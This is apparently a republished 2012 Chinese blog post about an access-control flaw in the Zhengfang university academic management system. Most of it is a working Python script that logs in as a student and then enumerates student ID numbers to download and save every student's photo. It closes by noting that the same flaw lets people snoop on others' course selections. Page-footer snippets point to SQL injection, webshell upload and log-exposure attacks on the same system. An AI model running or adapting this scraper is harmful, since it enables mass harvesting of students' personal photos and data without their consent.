【正方教务管理系统】HACK日志(二)

最新推荐文章于 2024-07-11 16:31:29 发布
最新推荐文章于 2024-07-11 16:31:29 发布
阅读量647 收藏
点赞数 1
文章标签: python 操作系统 爬虫
原文链接:https://my.oschina.net/apoptosis/blog/84003
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

正方系统的一个漏洞是获取学生图片时没有对学生身份进行检测。理论上来说,获取学生李四的照片,需要首先判断登陆者身份是教师或者学生,如果是学生还要判断登陆者是否为李四本人,而正方系统在这一方面并没有做得很好,导致张三可以轻松地获取李四的照片。

下面是笔者编写的一个简单的爬虫程序,Python 代码如下(Python 3.2), 


import http.client
import urllib
import os

_xh = '**********'
_pw = '**********'
VIEWSTATE = 'dDwtMTIwMTU3OTE3Nzs7PpxRSEGelcLnTaPgA3v56uoKweD+'
host = 'jwc.****.edu.cn:8989'
main_url = 'http://' + host
login_page = '/default2.aspx'
login_url = main_url + login_page
readimage_page = '/readimagexs.aspx'
print(main_url)
print(login_url)


conn = http.client.HTTPConnection(host)
login_post_data = urllib.parse.urlencode({
    '__VIEWSTATE': VIEWSTATE,
    'TextBox1': _xh,
    'TextBox2': _pw,
    'RadioButtonList1': '学生',
    'Button1': '',
    'lbLanguage': ''
})
login_post_data = login_post_data.encode('utf-8')
login_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'Origin':	main_url,
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer': main_url,
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3'
}

conn.request('POST', login_page, body = login_post_data, headers = login_headers)
result = conn.getresponse()
print(result.status)
#print(result.read())
cookie = result.msg['set-cookie'].split(';')[0]
#print(cookie)
conn.close()

readimage_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
    'Cookie': cookie
}

conn.request('GET', '/xs_main.aspx' + '?' + 'xh=' + _xh, headers = readimage_headers)
#result = conn.getresponse()
#print(result.status)
#print(result.read())
conn.close()

for year in range(1, 12):#11
    for college in range(1, 20):#19
        for major in range(1, 15):#14
            for mclass in range(1, 10):
                for series in range(1, 50):
                    image_xh = "%02d%02d%02d%02d%02d" % (year, college, major, mclass, series)
                    readimage_url = readimage_page + '?' + 'xh=' + image_xh
                    print(readimage_url)
                    conn.request('GET', readimage_url, headers = readimage_headers)
                    result = conn.getresponse()
                    #print(result.status)
                    image = result.read()
                    if len(image) > 1024:
                        save_path = os.path.join(os.path.abspath('./pic/'), image_xh + '.bmp')
                        print(save_path)
                        fp = open(save_path, 'wb')
                        fp.write(image)
                        fp.close()
                    else:
                        print('skip')
print('done')
conn.close()

后记:正方的选课模块依然有这样的漏洞,因此理论上来说,偷窥别人的课程、暴力选课也照样可以实现。


2012-07-01
By whypro

转载于:https://my.oschina.net/apoptosis/blog/84003

weixin_33775572
关注
正方教务系统新版php,正方教务系统最新sql注射漏洞修复 | CN-SEC 中文网
weixin_39979489的博客
04-13 4295
摘要你还再为考试挂科而烦恼么,你还再为大学里怎么要妹子电话而纠结么,你想快速找到学校里的漂亮妹子么,那么请看下文 1. 教室查询处有sql注射,如图你还再为考试挂科而烦恼么,你还再为大学里怎么要妹子电话而纠结么,你想快速找到学校里的漂亮妹子么,那么请看下文 1. 教室查询处有sql注射,如图1unionselectNULL,ownerfromall_tables爆出数据库2.找回密码存...
正方教务教务系统 请求接口
08-30
在IT行业中,教务系统是学校管理日常教学活动的核心平台,正方教务系统就是其中的一款广泛应用的系统。为了方便开发者构建与教务系统相关的校园服务应用,如成绩查询、课表查询、个人信息查询等,有开发者封装了教务...
正方教务管理系统数据库任意操作漏洞 _ 乌云漏洞库,乌云镜像站, WooYun 漏洞库, WooYun 镜像站1
08-03
正方教务管理系统数据库任意操作漏洞 | 乌云漏洞库,乌云镜像站, WooYun 漏洞库, WooYun 镜像站Home (/) / Bugs (/bug/ind
关于新正方教务系统(湖北工程学院)的one day越权漏洞的说明
小王的博客
12-19 1万+
漏洞基于湖北工程学院教务管理系统进行演示,漏洞覆盖新正方教务系统8.0以下版本,为本人一年前提交的漏洞,所以并非0day漏洞漏洞影响范围巨大,几乎涉及国内一半高校的教务系统,包含武汉大学、浙江工商大学等等而且据本人推测,此漏洞难以完全修复,因为我怀疑在该程序的设计阶段,权限验证模块与真实功能模块耦合度过高,所以到目前如此多的功能,已经难以完全修复所有页面了本人在发布漏洞前已和本校教务系统及公司提前沟通,并已修复了较为重要的功能模块。
双一流高校某教学系统存在多个高危漏洞
最新发布
蚁景网安学院
07-11 858
信息搜集过程中,除了用常见子域名扫一遍,还可以通过空间搜索引擎手动搜索。我用的就是把学校名称或者缩写作为关键字,利用一系列语法进行挨个查看。进行信息搜索(你得有一套自己的信息搜集逻辑吧,不然连这个系统都找不到)后,找到一处教学管理系统,点击页面上方软件,点击蓝色链接,进入教学系统。
正方教务管理系统后台敏感日志查看漏洞
热门推荐
弱弱的小雨鸟
01-04 3万+
正方教务管理系统作为正方软件的主打产品,从其官网了解到——截止至2012年10月,已有1,000余所高校使用了其数字化校园信息平台。从百度的最新检索结果也可见,成片成片的高校目前正在使用该教务系统。   经笔者测试,大多数高校的正方教务系统版本都存在该漏洞,在教务系统的网址后加上/log/2018-01-04-log.txt或者/log/2018-01-04-Errorlog.txt,便
正方教务管理系统HACK日志(一)
weixin_33845477的博客
10-19 640
2019独角兽企业重金招聘Python工程师标准>>> ...
正方教务管理系统.zip
08-22
"正方教务管理系统"是一个基于Python爬虫技术的实战项目,主要目的是抓取和解析教育机构使用正方系统中的教务数据。Python爬虫在IT行业中被广泛应用于数据采集,尤其是在没有公开API或者需要获取网页动态数据时。这...
禾木正方教务管理系统成绩自动批量录入对接平台 v2.5.zip
07-12
禾木正方教务管理系统成绩自动批量录入对接平台旨在解决在全国范围内使用范围甚广的"正方教务管理系统"成绩批量录入的问题,可以大大降低老师们的劳动强度,极大地提高工作效率。当前,还没有类似的软件出现,故此,几乎...
2021-08-16记一次无意发现正方教务系统的bug
qq_43548154的博客
08-16 8141
前几天无意中发现了正方教务系统(版本V-7.2.7)的教师评价功能的一个问题,就是可以在越过前端校验的情况下重复提交,达到修改评分的效果,并且打分可以为负数!
正方教务系统新版sql注入漏洞利用工具
01-19
相信研究过正方教务系统的朋友看到过网上传播的比较多的一篇文章提的/service.asmx中的BMCheckPassword存在注入,然而现在大多数正方教务已经将BMCheckPassword移除了,导致漏洞无法利用。本人研究了/service.asmx中的其它接口,发现zfcwjk1存在同样的注入漏洞,特将注入方法写成工具供大家学习参考。 zfcwjk1似乎是一个财务类的确认接口,利用起来稍微麻烦点,需要一个目标学校的任意学号。 程序执行后,会需要用户输入三个参数。分别是: 1.目标网址 2.目标学校的任意学号 3.年份(估计是用来确定这个学号所在年份的情况,随便填个2012或者2013,不行再换) 若提示“cannot access target url”则可能是目标网址填错了或者教务系统已经将/service.asmx移除了,如果是/service.asmx被移除的话漏洞就没法再利用了。 另外,若是校内网使用则建议挂代理。。。
Python-ZhengFangSystemSpider一只登录正方教务管理系统爬取数据的小爬虫
08-12
ZhengFang_System_Spider 一只登录正方教务管理系统,爬取数据的小爬虫
正方教务密码解密
11-08
正方教务密码解密。 输入密文 和秘钥即可
正方教务管理成绩全自动批量录入对接平台v2.1
06-05
禾木正方教务管理系统成绩自动批量录入对接平台旨在解决在全国范围内使用范围甚广的"正方教务管理系统"成绩批量录入的问题,可以大大降低老师们的劳动强度,极大地提高工作效率。 现在,大部分的学科成绩都是首先存放在excle表中,待进一步处理:添加平时分、试验分数等。尤其是一些学科使用了自动化的机考系统,考试完毕后,存储的成绩格式也最终可以存储为excel格式。当前,使用正方教务管理系统的学校很多。但是,老师们在录入成绩的时候很不方便,很容易输入错误,效率低下。本系统完美解决了上述问题,极高的提高了成绩录入效率:100人的成绩可以在2秒钟导入完毕,并且可以保证零错误率。大大降低了老师们的工作强度。本系统丝毫不影响正方教务管理系统的原有功能,也不会改变用户的使用习惯,上手容易,简单易用。 禾木正方教务管理系统成绩自动批量录入对接平台基于正方教务管理系统是©1999-2012 版本下开发的,其它版本的没有进一步测试。故此,本系统嵌有“版本测试功能”,您可以使用本系统的试用功能测试是否适合自己
正方高校教务管理系统漏洞修复
fengling132的专栏
06-15 5908
正方高校教务管理系统是一款学生成绩,选课管理系统,目前有众多高校使用这款教务管理系统。近期该系统爆出了一个高危漏洞,攻击者可以利用该漏洞轻易获取网站webshell权限。下面给出漏洞的情况和修复方法: 漏洞类型:上传漏洞 漏洞文件:/ftb.imagegallery.aspx 该漏洞文件没有任何权限限制,访问者可以直接访问该文件,从而通过文件自有的上传功能,来上传构造好的可以解析的后门文件。
正方教务管理系统爬虫
03-29
正方教务管理系统是一种常见的学校教务管理系统,用于学生选课、查看成绩、查询课表等功能。爬虫是一种自动化程序,可以模拟人的操作,从网页中提取所需的信息。因此,正方教务管理系统爬虫就是通过编写程序,模拟登录正方教务管理系统,获取学生的个人信息、成绩、课表等数据。 正方教务管理系统爬虫的实现一般包括以下几个步骤: 1. 模拟登录:首先需要通过程序模拟登录正方教务管理系统,获取登录凭证(如用户名和密码)。 2. 登录验证:将登录凭证发送给服务器进行验证,确保登录信息正确。 3. 页面解析:登录成功后,爬虫需要解析网页的HTML代码,提取所需的信息。可以使用第三方库(如BeautifulSoup)来解析HTML。 4. 数据提取:根据需求,从解析后的HTML中提取出学生的个人信息、成绩、课表等数据。 5. 数据存储:将提取到的数据存储到数据库或者文件中,以便后续使用或分析。 需要注意的是,在进行正方教务管理系统爬虫时,需要遵守相关法律法规和学校的规定,确保合法使用爬虫技术,并尊重个人隐私。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值